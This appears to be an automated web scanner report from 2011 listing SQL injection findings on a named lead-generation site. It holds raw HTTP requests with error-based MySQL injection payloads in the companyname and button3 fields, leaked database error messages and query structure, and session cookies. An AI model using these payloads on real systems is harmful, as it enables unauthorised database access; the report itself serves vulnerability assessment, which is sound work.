The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:01:32 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=g239udp24ra59hpikb8l9f93i0; path=/ Content-Length: 2198 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... p grps on grps.group_id = prj.groupId where prj.project_page_url = 'Marketing_Articles'/How_Do_You_Pay_For_Leads.html' OR prj.project_page_url = 'Marketing_Articles'/How_Do_You_Pay_For_Leads.html/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'Marketing_Articles'/How_Do_You_Pay_For_Leads.html/'' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:01:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=qd1ncpqcd25p1hq7pp9tvr2nf3; path=/ Content-Length: 2198 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... p grps on grps.group_id = prj.groupId where prj.project_page_url = 'Marketing_Articles/How_Do_You_Pay_For_Leads.html'' OR prj.project_page_url = 'Marketing_Articles/How_Do_You_Pay_For_Leads.html'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Marketing_Articles/How_Do_You_Pay_For_Leads.html'/' union select prj.catId,prj.' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:01:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=4vfoifr1viv9bhneet25e77i03; path=/ Content-Length: 2270 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... up_id = prj.groupId where prj.project_page_url = 'Marketing_Articles'/Top_Marketing_Challenges_for_2010.html' OR prj.project_page_url = 'Marketing_Articles'/Top_Marketing_Challenges_for_2010.html/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'Marketing_Articles'/Top_Marketing_Challenges_for_20' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:01:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=31cjhl13cc1f5cqkeqlvftvrv4; path=/ Content-Length: 2270 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... up_id = prj.groupId where prj.project_page_url = 'Marketing_Articles/Top_Marketing_Challenges_for_2010.html'' OR prj.project_page_url = 'Marketing_Articles/Top_Marketing_Challenges_for_2010.html'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Marketing_Articles/Top_Marketing_Challenges_for_2010.html'/' union select prj.c' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:01:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=snbjsmmup643u5prig2lm65am2; path=/ Content-Length: 2238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... grps.group_id = prj.groupId where prj.project_page_url = 'Marketing_Articles'/Using_Targeted_Sales_Messages.html' OR prj.project_page_url = 'Marketing_Articles'/Using_Targeted_Sales_Messages.html/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'Marketing_Articles'/Using_Targeted_Sales_Messages.h' at line 5
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 04:01:27 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=sf2dss0mtbabam5vrk3vhocma2; path=/ Content-Length: 2238 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... grps.group_id = prj.groupId where prj.project_page_url = 'Marketing_Articles/Using_Targeted_Sales_Messages.html'' OR prj.project_page_url = 'Marketing_Articles/Using_Targeted_Sales_Messages.html'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Marketing_Articles/Using_Targeted_Sales_Messages.html'/' union select prj.catId' at line 5
The ca parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ca parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:55:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=npn8t2n0rrpdu5fthp3g6240n4; path=/ Content-Length: 2182 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?ca'' OR prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?ca'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/leadflow/bulo00/project.php?ca'/' union select prj.catId,prj.gr' at line 5
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:52:49 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=jaslbsv30s2evm42mt5af3d200; path=/ Content-Length: 2214 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId='' OR prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/leadflow/bulo00/project.php?catId='/' union select prj.catId,pr' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:55:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=2p3dh815837qt6f8ddmqmg6dp2; path=/ Content-Length: 2310 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... j.groupId where prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc='' OR prj.project_page_url = 'leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc='/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/bulo00/leadflow/bulo00/project.php?catId=30005&iusrc='/' union select ' at line 5
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow'/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:46:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
Request 2
GET /ppc/leadflow''/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:46:28 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00'/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:46:33 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
Request 2
GET /ppc/leadflow/bulo00''/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:46:33 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php'?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:25 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9174
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... R(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting/Fina' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php''?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 02:01:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 108 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/bulo00/project.php'' was not found on this server.</p>
